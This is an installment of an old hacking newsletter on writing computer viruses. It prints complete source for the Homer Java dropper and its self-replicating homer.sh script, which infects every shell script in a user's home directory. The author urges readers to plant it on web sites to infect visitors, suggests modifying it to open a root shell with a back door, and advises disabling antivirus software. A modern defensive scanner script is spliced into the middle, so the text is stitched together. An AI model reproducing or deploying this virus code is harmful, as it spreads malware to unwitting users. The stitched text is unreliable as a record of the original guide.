GUIDE TO (mostly) HARMLESS HACKING
Vol. 3 No. 7, part 2
Introduction to Computer Viruses
__________________________________________________________
Part Two:
* How to write them
* How to write them and not get lynched
* Artificial life
* Virus humor
***********************************************************
How to Write Them
Wait! Wait! This is supposed to be about
mostly harmless hacking! Is Carolyn really going to tell
all the newbies how to write computer viruses?
Yes, I am. I will tell you how to really write
computer viruses, not just use some lamer program like Virus
Workshop that writes weak, helpless little viruses for you. However,
to use the information in this Guide you must know how to compile
Java or use assembly language. If you can master these,
you probably have enough willingness to work hard that you will
not abuse the knowledge of how to code viruses. At least
that's my theory -- please don't prove me wrong!
Besides, the only way to fight dangerous viruses is
to know exactly how to write them.
First, if you are like me, you may already be struggling
with the temptation to install a Java virus on your Web site
to infect unwary visitors. Yes, I really am going to show
you how to do this. However, it is a (mostly) harmless
virus. (Aw, darn!)
****************************************************
You can go to jail warning: This Guide only offers source
code for a (mostly) harmless virus. However, some people
are so terrified of and ignorant about viruses that you just
might get into big trouble if you really put this Java virus
on your Web page. Suggestion: if you absolutely cannot
resist, how about putting it on a link with the flashing message
"Danger! Do not click here! If you do, you might catch
a virus! Honest!!! Would I lie to you?!!??"
****************************************************
****************************************************
You can get punched in the nose warning: Some people don't
care if a virus is (mostly) harmless or even entirely harmless.
These guys are terrified of viruses. If some guy who browses
your Web site catches your virus and has a fit and sues you or
tracks you down and punches you in the nose, remember, you asked
for it. Don't expect me to feel sorry for you.
*****************************************************
OK, folks, here it is, a Java virus. The following
source code for the Homer virus is available on the floppy disk
that accompanies The Giant Black Book of Computer Viruses
by Dr. Mark Ludwig:
/* Homer.java by Mark D. LaDue */
/* December 7, 1996 */
/* (c) 1996 Mark D. LaDue
   You may study, use, modify, and distribute this example for any purpose.
   This example is provided WITHOUT WARRANTY either expressed or implied. */
/* This Java application infects your UNIX system with a Bourne shell
   script virus, homer.sh. homer.sh is kind enough to announce itself
   and inform you that "Java is safe, and UNIX viruses do not exist"
   before finding all of the Bourne shell scripts in your home directory,
   checking to see if they've already been infected, and infecting
   those that are not. homer.sh infects another Bourne shell script
   by simply appending a working copy of itself to the end of that shell
   script. */
import java.io.*;
class Homer {
public static void main (String[] argv) {
try {
String userHome =
System.getProperty("user.home");
String target = "$HOME";
FileOutputStream outer
= new FileOutputStream(userHome + "/.homer.sh");
String homer = "#!/bin/sh"
+ "\n" + "#-_" + "\n" +
"echo \"Java
is safe, and UNIX viruses do not exist.\"" + "\n"
+
"for file in
`find " + target + " -type f -print`" + "\n"
+ "do" +
"\n" + "
case \"`sed 1q $file`\" in" + "\n" +
"
\"#!/bin/sh\" ) grep '#-_' $file > /dev/null"
+
" || sed -n '/#-_/,$p'
$0 >> $file" + "\n" +
"
esac" + "\n" + "done" + "\n"
+
"2>/dev/null";
byte[] buffer = new
byte[homer.length()];
homer.getBytes(0,
homer.length(), buffer, 0);
outer.write(buffer);
outer.close();
Process chmod = Runtime.getRuntime().exec("/usr/bin/chmod
777 " +
userHome + "/.homer.sh");
Process exec = Runtime.getRuntime().exec("/bin/sh
" + userHome +
"/.homer.sh");
} catch (IOException
ioe) {}
}
}
If you post this source code to your Web site -- it will
do nothing! That is because this code must first be compiled
in order to do its business. If you don't know how
to compile Java source code for your Web page, you don't
know enough to safely handle viruses.
Also, you need to put the code for the shell script, homer.sh,
on your Web site so this Java program can ship it to your victims.
Following is the code for homer.sh:
#!/bin/sh
#-_
echo "Java is safe, and UNIX viruses do not exist."
for file in `find $HOME -type f -print`
do
case "`sed 1q $file`" in
"#!/bin/sh"
) grep '#-_' $file > /dev/null || sed -n '/#-_/,$p' $0 >>
$file
esac
done
2>/dev/null
In case you are wondering what this virus does -- it
flashes a message on the victim's screen reading "Java
is safe, and UNIX viruses do not exist." (For more
information on how shell scripts work, see the GTMHHs on shell
programming.)
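A defender's view of the same mechanism, as an added example that is not part of the original Guide or of Dr. Ludwig's disk: because homer.sh tags every script it touches with the marker line #-_ and appends itself after that line, a scanner can list the affected scripts and recover the original part of each. The function names and the constructed sample tree (which uses a placeholder line in place of the virus body) are assumptions made for this example.

```shell
#!/bin/sh
# Added defensive example: locate and clean scripts carrying the Homer marker.
# Assumption: the marker is a line consisting only of "#-_", as in homer.sh.

# Print "path:line" for each regular file under $1 whose first line is
# exactly "#!/bin/sh" (the virus's own targeting test) and which contains
# the marker line. The line number shows where the appended copy begins.
scan_homer() {
    find "$1" -type f -print | while IFS= read -r f; do
        [ "$(sed 1q "$f" 2>/dev/null)" = '#!/bin/sh' ] || continue
        n=$(grep -n -x -F -e '#-_' "$f" 2>/dev/null | sed 1q | cut -d: -f1)
        if [ -n "$n" ]; then
            printf '%s:%s\n' "$f" "$n"
        fi
    done
    return 0
}

# Write a cleaned copy of $1 to stdout: everything before the first marker
# line. A marker on line 2 means the file is the dropper itself (.homer.sh),
# so the cleaned copy is just the shebang and the file can be deleted.
clean_homer() {
    sed '/^#-_$/,$d' "$1"
}

# Constructed sample tree. No virus body is included: a placeholder echo
# stands in for the appended copy.
make_samples() {
    d=$(mktemp -d) || return 1
    printf '#!/bin/sh\necho backup done\n' > "$d/clean.sh"
    printf '#!/bin/sh\necho hello\n#-_\necho PLACEHOLDER\n' > "$d/infected.sh"
    printf 'notes\n#-_\n' > "$d/notes.txt"   # marker but not a sh script
    printf '%s\n' "$d"
}

# Demo: report the infected sample, then show its cleaned contents.
dir=$(make_samples)
scan_homer "$dir"
clean_homer "$dir/infected.sh"
rm -rf "$dir"
```

Review the cleaned output before replacing a script with it, since a legitimate script could contain a #-_ line of its own.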
Homer is a harmless, humorous shell virus. However,
it doesn't take a genius to see how it could be given a
destructive payload by modifying homer.sh. If someone were
to be dumb enough to surf your booby-trapped Website while logged
in as root, it would be trivial to use a homer.sh modified to
give you a root shell with your very own back door.
However, in general Java viruses are not terribly dangerous
because they run so slowly. This gives their victims time
to get suspicious and terminate these programs. Presumably
a Java virus would take so long to create a root shell and back
door that the victim would kill the process in time.
*****************************************************
Newbie note: Don't ever surf the Web while logged in
as root. Don't ever try to break into someone else's
computer while logged in as root. Any time you are running
as root, it is really easy for you to mess up your Unix computer.
If you check out the phf abuse log at the Hacker Wargame section
of http://www.happyhacker.org, you will see that quite a few
people have tried to break into our webserver while running a
Web browser and logged in as root.
*****************************************************
The problem of some programs running really slowly is
a major reason why you can't do much as a virus or antivirus
programmer unless you also learn at least one assembly language.
Assembly language is fast! No time for the victim to react!
It also makes it easy for you to do complex and infuriating things
while a computer is only beginning to boot up. For DOS
and Windows you will need an assembly language compiler for 80x86
(substitute 2, 3, 4, 5)/Pentium type computers. Two of
the best are Microsoft Macro Assembler and Borland Turbo Assembler.
Places where you can get them (you have to pay, they are not
free) include http://www.pparadise.com and http://www.supershops.com.
If you are really serious about learning how to write
viruses and antiviruses, you may want to get the Giant
Black Book of Computer Viruses, Second Edition, by Dr.
Mark Ludwig. Not only is he one of the world's leading
virus researchers -- he also is the only one I have discovered
who will tell you EXACTLY in almost endless detail how to write
viruses and antiviruses of many sorts. However, this book
is not for newbies. He assumes you already know a great
deal about DOS, Windows and Unix, and are a programmer.
It comes with a floppy disk with source code for many
viruses. Here are some hints for how to extract these viruses
from this disk successfully and without killing your computer.
1) This disk is designed to be installed from MS-DOS.
If you try to install it from Windows, it will give you a runtime
error. If you don't know how to work from MS-DOS,
you aren't ready for this book.
2) The installation program for Dr. Ludwig's virus disk
ought to activate your antivirus program. If it doesn't,
your antivirus program is even more worthless than most.
To be certain that you can succeed in installing a directory
full of viruses, deactivate your antivirus program(s) first.
If this sounds too scary to you, don't buy this book! If
you mess up your computer by following my advice, too bad, that's
what you get for playing with viruses.
3) Here's what Dr. Ludwig's installation program
will tell you:
! ! W A R N I N G ! !
If you're like most computer users, you've grown used to being
pampered. That's a nice way of saying that software developers
no longer expect you to have a brain. Like a stupid monkey, all
you need to do is put the CD in the drive and let it auto-execute,
or put the floppy disk in the drive and type "setup".
If that's what you want and need, THEN DELETE THIS SOFTWARE
OFF YOUR COMPUTER IMMEDIATELY AND DESTROY THE DISK WITH A HAMMER!
We're really not kidding about that. This disk is for thinking
beings. Improperly used it could be very dangerous. It could
ruin your computer, your career and your life. THAT IS NOT A
JOKE.
DO NOT EXECUTE ANY PROGRAM IN THIS DIRECTORY UNLESS YOU KNOW
WHAT IT DOES.
DO NOT EXECUTE ANY PROGRAM IN THIS DIRECTORY EXCEPT IN A CONTROLLED
ENVIRONMENT.
I suppose now you just can't resist buying this
book. Guess what -- you can't get it in any bookstore.
They are all afraid of getting sued. Also, in some countries,
mere possession of The Giant Black Book of Computer Viruses
is illegal. Just to be safe, you might want to delete this
GTMHH right now and only read it from our Web site at http://www.happyhacker.org.
If you are absolutely determined to get this book, within
the US you can order it from American Eagle Publications by phoning
toll free 800-719-4957; outside the US you can order it by calling
(insert country code here) 520-367-1621. It costs $39.95.
This price includes the floppy disk with all that stuff that
upsets your antivirus program. Shipping and handling costs
are extra.
If you live within the US, you can also buy The
Giant Black Book of Computer Viruses by sending $44.95
(this includes shipping by Priority mail, which is supposed to
take two days) made out to M/B Research, PO Box 1520, Cedar Crest
NM 87008. That's my company. Sorry, I'm
not going to ship the book outside the US because I don't
know in which countries it is illegal. I would feel really
bad if you were to go to your post office to pick up the book
and instead got picked up by the police.
American Eagle can get the book to you at the lowest shipping
cost, if you don't mind it taking a long time to get to
you. I can get it to you faster, but it costs you more
for the shipping.
If you want to buy The Giant Black Book of Computer
Viruses with a credit card over the Internet, check out
http://www.amazon.com and http://www.infowar.com. Amazon.com
will usually take much longer to get the book to you than any
other book seller, however.
How to Write Viruses and Not Get Lynched
Just imagine how people will react when you are at some
party full of ambitious young professionals. Everyone is
trading business cards. You hand out ones that say "George
the Doomster. Computer virus design. Free samples,
muhahaha." You'll be real popular, yes sirree!
OK, so you only plan on writing harmless viruses.
Try to tell that to the lynch mob that may pay you a visit when
they discover it was you who wrote the code that made their Win95
computers come down with habitual General Protection Faults.
Remember, even the virus designer who has the best of intentions
may write a seemingly harmless or even beneficial virus that
turns out to have a bug in the code that accidentally does harm.
Also, since the best viruses are memory resident (they hide in
RAM memory) they really can help create General Protection Faults
just by hogging too much memory.
Besides, people like to pick and choose what programs
run on their computers. Imagine that! If you design
a virus so it will sneak into computers, don't expect people
to thank you and admire you. If you do choose to code a
virus, please consider coding politeness into it. You could
have it ask permission to take up residence on each new computer
and leave when asked. Shoot, if I could find a copy of
that virus that makes a mirror image of Windows desktop graphics
each Saturday, and if I knew how to uninstall it without paying
a bunch of money to Panda Software, I'd enjoy sharing my
computer with it.
Artificial Life
Now that you understand the basic principles of virus
coding, let's take a look at the Big Time: using your programming
talents to create -- or battle against -- artificial life.
Just what is artificial life (insiders call it alife),
anyhow? According to the most prominent researcher in this field,
Dr. Chris Langton, artificial life is "... the study of
man-made systems that exhibit behaviours characteristic of natural
living systems." -- Artificial Life, edited
by Chris Langton, Addison-Wesley, 1988. You can get this
book from http://www.amazon.com.
There are three primary forms of alife. Some alife
is growing -- or trying to grow -- in test tubes full of RNA
(ribonucleic acid) or other chemicals. The second major
form of alife consists of computerized robots which their creators
hope will someday achieve the ability to adapt and reproduce
without human assistance. The third type of alife is computer
programs that exist, adapt, reproduce and evolve in the virtual
landscape of cyberspace -- what we know as computer viruses.
Of all the forms of artificial life, computer viruses are
the only ones so far that reproduce, escape the laboratory and
take up life in the wild. Viruses that follow rules of
good behavior -- only living in computers when invited -- are
often created by alife researchers.
How can you meet and get involved with alife designers?
http://alife.santafe.edu/alife/events/ and http://alife6.alife.org/
offer listings of upcoming conferences on this topic from around
the world.
Closely related to artificial life is the Berkeley Initiative
in Soft Computing (BISC) at http://http.cs.berkeley.edu/projects/Bisc.
If you want to volunteer to harbor artificial life viruses on
your computer or LAN, you can probably find a researcher at one
of these sites who would be happy to give you some of his or
her harmless (you hope) creations.
American Eagle also sells a book Computer Viruses, Artificial
Life and Evolution by Dr. Ludwig (American Eagle, 1993).
It costs $26.95 and is almost impossible to get unless you order
it directly from American Eagle.
Virus Humor
As we end this Guide, please remember that with the
right attitude, viruses actually can be fun! Next time
your computer gets infected by one, just remember, "don't
worry, be happy." Following is some virus humor to show
how other people have coped cheerfully with an encounter with
this pesky new life form.
(a.k.a. David Bradley, Betty Cheng, Hal Render,
Greg Rogers, and Dan LaLiberte)